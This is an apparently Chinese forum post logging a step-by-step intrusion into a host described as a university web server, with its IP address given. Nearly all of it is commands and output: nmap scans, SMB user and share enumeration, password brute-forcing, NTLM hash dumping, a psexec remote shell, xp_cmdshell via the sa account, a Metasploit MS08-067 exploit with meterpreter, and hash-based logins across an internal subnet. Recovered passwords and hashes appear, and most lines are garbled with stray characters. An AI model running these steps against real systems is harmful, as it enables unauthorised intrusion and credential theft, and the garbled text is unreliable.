广西师范网站http://202.103.242.241/
* L7 e Y. |( w: r6 I$ Y2 x* a2 p4 s; o' h H, H- s
root@bt:~# nmap -sS -sV 202.103.242.241
- X; R7 |# T; T9 ?6 n8 x
i& [- J6 e/ E9 L2 hStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST2 Y5 H1 s: J8 n$ q C8 e
7 w% e6 k" @- _" w/ ~* V
Nmap scan report for bogon (202.103.242.241)2 O5 a. B7 F& @! O H
! `, N2 N$ l0 i/ y+ B6 a: AHost is up (0.00048s latency).
, g9 D9 D: S4 V7 t: \7 s1 r8 M+ c/ w7 u2 v+ \2 Y3 i! n
Not shown: 993 closed ports/ K. n: f& H* \8 }9 B6 m
, r* B) f" z8 {% z9 E
PORT STATE SERVICE VERSION
" K) h% j+ N4 Q% W- w/ U+ m( E0 ?% W- ]
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe) Q$ v3 {7 T: q6 M
+ B! O% A% _7 z+ ~4 Q$ t$ M' n
139/tcp open netbios-ssn7 k7 _5 K+ o# z c; S+ `8 i
1 X; V8 ^; w0 ^; n9 x* |445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds2 C# ^) Y+ J' d# N
8 ^$ a9 C9 L3 Z
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)7 h, ] N5 k& x- Z
" m# m% Q9 g5 p' T1026/tcp open msrpc Microsoft Windows RPC4 h# v& F, b' b9 ]3 {6 @2 J, f8 p
9 S ^& h7 P" ^0 p! H* H) e5 a
3372/tcp open msdtc?
$ C6 z H/ O9 a2 l% Z: g8 M; u/ X! ]4 W4 y- F0 T
3389/tcp open ms-term-serv?/ ]$ C$ ~0 K! Q% H( G/ D/ d
! G' r( c7 x2 \- X1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
. ?) j/ ?: j! J7 LSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r) ^2 b$ O n: J' C) s. v
( w! m5 V' e% m7 ~/ s: T
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
0 O. c( _9 Q1 L+ M6 \- @, o* n
5 a/ F0 f' j! D, `' YSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)0 z* Q1 J6 a9 t a
: d( k& |3 {+ \" v aSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO6 Y% c h3 ~/ C' ?
& d9 D0 x# J, _! m3 x* j; h) |SF:ptions,6,”hO\n\x000Z”);7 H" o8 }# s m$ N7 V) J: u9 v/ q
7 U, Z0 G6 U0 ?% o! r+ CMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
! R3 e2 f G) ^
( s4 y$ V+ I+ t6 P6 e2 ~* rService Info: OS: Windows8 l4 U& a; t% N# b
) C" t: |' l3 z7 d$ y ]! ]% o/ AService detection performed. Please report any incorrect results at http://nmap.org/submit/ .
) k. d+ v8 s: _ j# e% S% Q4 P2 k' B, q; y8 p
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds- f0 E- j e0 ~! Z2 R: S x
* E5 r! ]. P+ M. ^" P% {2 d3 mroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本/ J& ~% Z- ^* ?# |
8 F. n }' p; b2 |/ x! P. `-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse4 }4 T' z7 z) \: y, C" s5 o& E
3 N1 _: J$ S& P" K9 V1 f-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
7 m# x, u* c1 y1 A& e; w ?
( a+ i- C0 ]8 V4 D-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse/ @2 |1 Z$ A) ~& @) h
1 W# f: j" n* n3 q$ K: z
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
' k+ [9 P2 G- Y/ k0 N- w) t/ I& s; ?5 e% E2 \ @( H ?
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
7 X8 [) z9 [0 p( |" k# W
) N( M# U0 X( U-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
3 {& m' ~8 |6 ^/ G ^; m# m4 v. I5 O5 X5 Y
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
8 ^8 V; x5 n0 c4 r1 a# y) Y
" N) s- x) Z' L c: f-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
3 p9 W8 N4 c+ S o5 @: _
E3 v n5 ]) V3 l/ m-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
$ T9 ^* i; x$ f: `7 | D' o9 b/ \; x5 c7 ?* @4 [
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse0 Q" F3 ?8 h: b
( W- P2 ^' q7 ^" T) i
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse3 c1 L. k. h3 x1 A8 |# U
8 M; R, e7 w3 E6 W2 Q' s9 A
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
" C+ m# i( J) g0 N. A6 x2 d& e: _
( [7 k' _9 k0 n/ d9 F0 `/ C-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
7 @$ t7 l0 v$ u: R u- g% K2 C. d, p0 J
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
9 H% |5 e3 @8 }" Y* R: @' Q8 m8 q# U( q P# T$ g& p9 B5 B
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse1 ]8 y v& A4 [- z+ M
' M- S% U5 i$ Z8 Zroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
0 [! ]# w0 v& u* P3 f/ @4 R! | z
% }; ?' A1 N% n' f" a//此乃使用脚本扫描远程机器所存在的账户名/ V$ ^! o Q" q
' C+ d" ^; i# A; O yStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST4 V" ^2 |2 Q2 q) |- P0 [& E5 L
1 E7 @+ Y0 R( z- N: w2 NNmap scan report for bogon (202.103.242.241)
" m: F, N- `0 r
" ^1 s" M8 l. K h$ h' }$ qHost is up (0.00038s latency).+ k) u+ D* n0 s2 ^5 g @
8 \+ l5 K! X. K- S LNot shown: 993 closed ports
5 [; n8 W! P& D/ T& K. N7 _* I
7 T+ Q# L' q# T$ N; Y% GPORT STATE SERVICE
+ R2 R0 m8 A: \; M- s0 Z' X ]8 ]3 [/ t4 ]: {- g
135/tcp open msrpc
$ d; u- ]6 o1 ^- [9 [
( {; A1 Y* ]. z+ |7 }- C5 X+ Y& P139/tcp open netbios-ssn/ x0 f2 h: X* v! C$ X1 W3 f. C
: H1 a8 L; Z b5 u p9 n
445/tcp open microsoft-ds
) F0 a3 u. P$ [0 V$ ^2 f) A' B. J/ Z
1025/tcp open NFS-or-IIS! d0 {8 k$ k9 [ N5 j8 ~
) H2 d3 _9 J$ p" f2 _/ M
1026/tcp open LSA-or-nterm
# W, Y5 A2 @/ u+ j4 |6 o
' `" M" v: X4 q- K4 e3 D+ c3372/tcp open msdtc
" [7 r0 R& o$ x8 [
o b# d# f" G$ t2 x# i( m3 L; T3389/tcp open ms-term-serv6 K+ L' O" A& W
' w1 @( Y4 K( T- t5 x
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
" b5 t _8 x8 D9 J
! H2 h% V0 @' |; _. CHost script results:" w8 }, m: y3 p2 e4 k
! Z* O+ o* i3 Q6 W| smb-enum-users:
F0 \# W* ~# f4 i+ {. ]) L$ {0 A( d4 y$ B4 Q
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果9 H- ~5 q0 f: d, j0 H! `) h9 _ P
! {4 c- D: j; I) q
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
# f& t8 S' I4 s+ U3 l) G6 _! m; p( P; m2 L
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 8 i+ a$ k, b" M
& _" `, |+ T% U/ X$ B1 u1 @
//查看共享
* R# V: z2 M# t7 s8 _8 m# G
5 A8 t, Z9 q0 z5 B2 X4 eStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
4 G& J7 [+ u' S. ?' S; u8 s4 |- {, K) _, J$ l
Nmap scan report for bogon (202.103.242.241): a {6 J# ]) ~' u
9 i8 W& ^8 M1 x* P$ P p$ b
Host is up (0.00035s latency).# L1 N" n% r8 U5 T% [& _
4 Q- C' F: W* c. BNot shown: 993 closed ports
) U3 Z" Y+ d4 R: R8 O
" u5 f, L8 x$ @( @3 M6 h$ JPORT STATE SERVICE
W; D# ~2 l4 [( w2 {- `
1 X! ~+ a& k8 y4 r" z3 n5 Q! O4 q135/tcp open msrpc, s1 K. D* X: [ A Q, k( x6 R! w
A0 I: a. f4 p# \( W) r6 V
139/tcp open netbios-ssn' @. b" F* _% s* Z8 M0 m1 G1 e
; H' E; W7 |$ A+ g445/tcp open microsoft-ds
6 ~/ |/ J' E! _/ T, ^3 `5 t0 I8 V; Y: m8 G
1025/tcp open NFS-or-IIS
- E: p$ m8 Q/ u# M6 v% c. B7 M) M7 x. o+ N T
1026/tcp open LSA-or-nterm
3 {1 M( |( B9 o F1 g' I7 m8 h/ B0 `
" m t8 i7 L4 U& w8 ?$ P3372/tcp open msdtc
- @; |( {3 S, F" d- y, z" d! k5 q: u% ~, z6 J
3389/tcp open ms-term-serv
" C1 j( ~( k: J. C& U2 L% O' _# F* @" Q& f3 }& E
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)1 O) T8 W2 Q4 S8 T9 q: y
3 O, K5 k4 O, ]3 t% O( q
Host script results:
4 c" u1 @% R- H% E0 Q9 H' \) W' O' N; `+ Z5 p
| smb-enum-shares:7 H! C0 O' f# p/ Y2 `, A
( ^ K' j& d) t0 j# C* G, U
| ADMIN$
+ |7 }8 V' r" {) m% v) Y k
, n8 t3 n T/ j% \( A4 l! ^8 A| Anonymous access: <none>0 C1 R' f N |+ K
4 A5 o% E8 p; b1 m1 ]
| C$" s( a3 Q% u( D! U! n4 e* p) e: H
" X5 b5 k3 b- Z, U4 w" ^( v| Anonymous access: <none>; w1 Z% f8 K6 |# R" h: X' f6 B+ t y: n
: F: D' |4 J5 d3 M
| IPC$
\" _. G5 [$ X, k9 V5 H S! f) a' L
|_ Anonymous access: READ2 j9 j$ U7 d! l s- i3 |/ z
" D* C/ L8 a1 T2 z$ UNmap done: 1 IP address (1 host up) scanned in 1.05 seconds8 Z. a0 h4 O& c( J! Y/ Z3 O! t
w% K( X4 k4 J+ s
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 , o2 W- s4 M1 ]) f0 A
& I8 ]* e- J. B( c5 B3 ?" Y# i
//获取用户密码
/ M4 }* [' p* e2 J- E% F( j1 w% S, G
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
( P9 W4 ?6 V$ |( @" P
( A! r) t6 @+ a4 l: rNmap scan report for bogon (202.103.242.2418)* _. W% d* d! E! V, S1 p6 M3 N0 G
2 F& ?8 \2 x/ u' T6 V4 F% YHost is up (0.00041s latency)." G& p% }2 Z0 e z" n1 I9 z& u
- c: ?" @) k4 ^6 HNot shown: 993 closed ports* T9 j, r) ~9 n5 h
P5 |0 q1 }0 I
PORT STATE SERVICE0 [. k5 O# `' H! ]) K6 C+ n( _4 ~
( {2 }. Z& D) Z6 V6 N135/tcp open msrpc
$ m( Q2 k: t& y* g3 J' K# o1 P4 J X/ j8 \: m9 Z/ [3 C0 E7 @+ v
139/tcp open netbios-ssn# [: j) m( Q3 n6 J. w& d) y
^$ j3 u, [8 R( W- _% T
445/tcp open microsoft-ds+ S8 t' G) _/ |: M. y4 D: Z1 |
. J; l T$ c3 |# s& {: b9 o1025/tcp open NFS-or-IIS
1 s: y. d7 Z$ r" S
4 G D3 [0 O$ C9 B4 A g& C1026/tcp open LSA-or-nterm
$ @4 }$ t3 p0 o5 }: W7 S0 K, H3 d
3 X. G) [2 ~, u% c. O- V6 L3372/tcp open msdtc; s( c0 N2 l3 N, {# P' o5 S6 R
$ g1 |9 l1 x E3389/tcp open ms-term-serv( T( w K& j* N/ a: k
( `- g) k3 ^' _: r% _: wMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)' e8 {( P ^- ?% E
' S7 L1 C& i& u$ A6 Y+ S+ O
Host script results:
+ V! L0 c" k* k8 P7 Q) u6 a+ s( Q/ `6 R
| smb-brute:
# U! r5 K9 H2 i: u
: T1 p. E1 m: c0 P: M4 S: b$ }6 Oadministrator:<blank> => Login was successful1 |) i/ D; u9 Z, T" l1 e
7 h( W- K9 q0 w: Q
|_ test:123456 => Login was successful
# Y6 R, b& |. c: e0 q* @9 w1 u4 ~
( W8 U5 B) @+ J/ {Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds: Z" h. T/ T" v( l7 r) Q! j
: ^* X( y: I6 a' d7 ?root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash3 z( l' d6 i; r3 P; \$ Q% Z
" ~! b7 F" l0 Q3 V% V% D; sroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
; J0 b$ a) |, @& g# }* M8 J& e2 K/ h y" A
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
, T/ I: b& m" Z, C0 E+ v V
5 C5 y7 p, ]' B# N, Vroot@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
& z |' H' N# \$ { k3 |! S; ^2 }" B; Z+ ^$ S W
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST1 V, _, B1 ?2 d4 R
/ O) K+ m0 J6 h" a6 C
Nmap scan report for bogon (202.103.242.241)! ~9 ~" ]+ p, d) z! E
& ] o3 ~3 s, u* L) L$ P# [. FHost is up (0.0012s latency).3 u. z8 D8 u, I" W
0 y% b& [* p$ `$ [
PORT STATE SERVICE% O1 p! h% a' B5 e5 i
, l& J2 w, D" g
135/tcp open msrpc: G" ?, l# c" H3 @% N
# n' f, }2 s, |& A2 c4 _
139/tcp open netbios-ssn
& u* P7 R# l. }3 o# s3 e Q
5 m9 [5 t5 M2 \445/tcp open microsoft-ds2 n4 f. Z# J3 t8 j( s
8 G; H/ q/ j. K" \' r
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
: H/ A7 d7 ?/ q; D+ f! V0 Z( N: c8 ?4 h& X
Host script results:8 O8 N5 u: f0 J0 Y8 T% X
/ f( t1 q( m3 f% m( c) r| smb-pwdump:+ N! \3 f4 u- s) c a
p# V% X3 B; w3 K J( {| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
; l, O1 X" ?( K
5 A9 n& _) i( I" P& ~: @| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************6 A* w5 |6 W u* z' s% }
; q4 H+ A, z6 W. @
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4- [- j, d* N- r& o" W
, s- r1 H( ~: g! @|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2& O+ v, d8 B7 m9 v6 G
% s3 {' \9 l( \7 F- {# T& [Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
: s8 z7 P! b5 ]5 Y0 z$ M& w9 d: v# y% G
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
: V2 p: K- ^/ [3 Z: z1 G
! I5 X1 R2 V2 E& u S- _& B# ~-p 123456 -e cmd.exe x: ]: l1 T% Y" l" z8 w! G
4 U6 \( Z' o/ L6 p
PsExec v1.55 – Execute processes remotely' E+ L& `8 p) i% E, T5 R
2 S6 m2 L: R+ y5 K
Copyright (C) 2001-2004 Mark Russinovich
1 X0 `4 |6 i1 d. K2 X% Y' _0 Z1 u
# g+ X$ x( R$ k. R1 z2 X) wSysinternals – www.sysinternals.com+ T) e. k; w) J
- U2 b( @: s: L- q3 q
Microsoft Windows 2000 [Version 5.00.2195]
* w. ~8 h2 ]. ?6 n* U' e$ ?5 [% a, [! [# ^
(C) 版权所有 1985-2000 Microsoft Corp.
& N: y; P4 J/ X) n, f% m! N
2 L, `: u3 j5 E4 l# zC:\WINNT\system32>ipconfig8 p3 `) v/ L. F
% M" W+ k- q0 G0 `9 dWindows 2000 IP Configuration5 q2 ^0 x8 a. [% F5 _* l6 U
7 S- V! k5 B' M% `1 G$ Z& v! s, @# c
Ethernet adapter 本地连接:
( b+ K2 |2 {2 h; y
2 i0 Y$ o( _- W7 }3 _4 [3 d# a8 h, CConnection-specific DNS Suffix . :
! t, l! N# H4 {( j0 {
) q t5 W5 u3 z N" O5 nIP Address. . . . . . . . . . . . : 202.103.242.2415 n- b) i6 J9 m% L9 O: m [! D+ G) w
/ e4 g* r+ R! ^, i: q
Subnet Mask . . . . . . . . . . . : 255.255.255.06 j7 s. L' g0 z. r
o+ r# ?( v/ Y2 R' j7 ^
Default Gateway . . . . . . . . . : 202.103.1.1+ Q4 j/ b/ i- o u: b- b
! K* o0 E1 i( r) N6 |7 KC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
1 A& F6 U& c0 D9 O: l
2 l0 j8 G3 v3 E8 U! a5 Croot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞6 n3 V+ ^ u. E6 S* M
; t6 c! [- k y3 H9 Z
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST4 |! e$ q3 O8 ` [$ E# v
% `# n9 L+ e, b. W
Nmap scan report for bogon (202.103.242.241)
: E; P) w5 {3 k9 c4 a% J1 N
2 w) r, l7 i6 G. k; ^9 v* pHost is up (0.00046s latency).& ?" t8 [# k0 d7 m i1 V
; Q$ g# ~- Z. p4 T' q8 ENot shown: 993 closed ports `# }, Y- C1 E ?4 G: k
# R7 d. B3 V$ |, g) Y% GPORT STATE SERVICE- R4 z$ ?5 E1 h. [
) o. Z% n( n7 w& M9 D% p7 V; z135/tcp open msrpc6 a, p( ^4 I2 }. [3 p' W
& ^" m0 L+ @# f5 f. q: E: M9 g
139/tcp open netbios-ssn
- P: D" S$ O( ?( [
0 S' G( E7 U2 @# z445/tcp open microsoft-ds5 g4 t$ J% r( o3 P' L5 p; N
; |* l- B* }& v2 _
1025/tcp open NFS-or-IIS
) e9 j0 j2 D0 W; Z4 ]* \' j0 d/ K- e+ D
1026/tcp open LSA-or-nterm
. e% V" D: \/ H' j1 p/ X
! |! s3 \5 \, _9 T2 T5 v0 ]3372/tcp open msdtc& }# s7 E; ~9 A! \: c
) H7 W' ~4 D; p3 N! B- a
3389/tcp open ms-term-serv
7 J; y* t# J' G7 ~+ X W4 _* [8 V3 j
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
9 w% I! m, x+ H3 }. i" M5 L) K
4 Z, R# X' v: a3 C# \Host script results:
9 m9 T0 Z/ |& Z, f
' z: @6 q+ @* S5 r. j+ G) a| smb-check-vulns:
0 V9 x( Z1 q, I5 S
3 H0 C$ w# u8 W) q|_ MS08-067: VULNERABLE O5 E4 g) e. |, U7 `5 s+ x
8 W3 R4 M" ]3 ?' J* pNmap done: 1 IP address (1 host up) scanned in 1.43 seconds
, \! C7 Q% Q4 ^! X' X7 I/ H' g1 j, s9 i" ]
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
9 M( h/ C$ B% t$ \$ V
2 n% }( g/ i) N M* amsf > search ms08: W1 r. `4 U) f* }
( h8 v2 N. Z ^- ^+ }+ ?" Fmsf > use exploit/windows/smb/ms08_067_netapi
2 n$ t. x6 ^) R8 K0 c; P2 K
7 E2 R; P8 ?3 }0 |7 bmsf exploit(ms08_067_netapi) > show options
6 ^3 d- M8 Z/ s) r) S2 H! _1 l( ~) h& p5 y" `$ c
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
+ \9 k' C% e! B( Z" G/ k* a1 k2 Y& @4 a0 M* L
msf exploit(ms08_067_netapi) > show payloads
0 Z) ~$ P( w# ^) g8 a. C1 R. j3 y( p
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp4 V5 Z' X) T' l- w
) {. X7 c8 x: v6 E0 Wmsf exploit(ms08_067_netapi) > exploit* x5 l5 K- u- b" A; k. z
9 T3 y: _0 h' H, k+ _meterpreter >
- W9 o. G' {1 l7 M2 h
" r" }7 S- n5 |( t& XBackground session 2? [y/N] (ctrl+z)( y6 b; d( E+ w( r8 C( |0 M# @! B
" x) K" u/ |7 o2 k; i% r8 m; qmsf exploit(ms08_067_netapi) > sessions -l1 n/ c1 [1 a2 [& S, |
$ X- Z" N* Y7 d$ h9 o2 }8 `
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt0 x$ [9 C- S7 [' l! I1 `
1 l9 D+ n) x$ o9 y- E
test( R. k3 d: j; d
9 S5 `$ |; e# P7 Z8 n- X7 uadministrator; \! ~3 _% a8 z' K& X- q* B; j: u
" |1 R0 C! r* i# W( k
root@bt:/usr/local/share/nmap/scripts# vim password.txt3 ~. U; l5 K$ [& ]* `: p
! ?; s. M5 l: w+ t7 B44EFCE164AB921CAAAD3B435B51404EE6 e! K2 G& T2 g" i
, p9 T' \, e& ]4 U" Y( I7 Vroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 5 v9 z1 O. J* w. F/ u- @4 o
P+ A$ g q, t; B- X g+ Q
//利用用户名跟获取的hash尝试对整段内网进行登录' x( l9 x# P/ u5 C
! c! {8 w- n! WNmap scan report for 192.168.1.105
7 h+ G5 X& V" ~: V4 ^7 K
6 C( m& A$ T z3 yHost is up (0.00088s latency).
: L. @: Z* o. x/ t4 t: ~: M+ z
0 @- D+ z4 \/ u: x4 L7 t! D# L+ x" INot shown: 993 closed ports; o4 e9 a3 {! L" p6 [* _; r
# X7 p! x" ^3 D$ ~, m( y
PORT STATE SERVICE+ D) W# w* V5 b7 x8 j' R
O' o6 w! }* c
135/tcp open msrpc
. q% [5 B9 c! i& @* l; S2 S' E" L( ~+ y7 P+ A6 F) @% M
139/tcp open netbios-ssn
* r/ |2 K0 e- k5 X4 m
' \ ~3 E7 ~& c! m! }! y445/tcp open microsoft-ds
3 v- u; e; D) S7 q: C- Y, M f9 r$ p' ]7 | B7 |
1025/tcp open NFS-or-IIS
: M& p8 Z& f. ]: G2 O( O, v
" v& Z# }+ z+ B: D% _% h; Y1026/tcp open LSA-or-nterm
9 J; A$ [7 W2 w+ k: |) a ]! E
, [! @7 ^! m# a5 M3372/tcp open msdtc6 \, s5 Q$ }+ v5 F! t4 F" q
% [* f2 i# l5 ?9 t' V
3389/tcp open ms-term-serv& u5 q4 v/ ~1 `4 p! g/ R
) ^4 a# W1 N( ]( ~( I! }
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)% {0 d o/ _$ B* M
: ?" T; E0 V( C/ F8 Y* WHost script results:7 a" P. ~' O) o
( @" e4 _. t7 a. }" M
| smb-brute:& T9 @6 E0 b. S; e1 S' q
6 D/ W% x, j% w: F% y$ A% R* m, K5 k
|_ administrator:<blank> => Login was successful. ^6 }0 D& R! X% e& D
: h$ C3 H% p- G
攻击成功,一个简单的msf+nmap攻击~~·
1 U" C, c0 Q- g b
9 @( q |1 {& l# @! c& o. e |
发表于 2012-12-4 12:46:42
收藏
支持
反对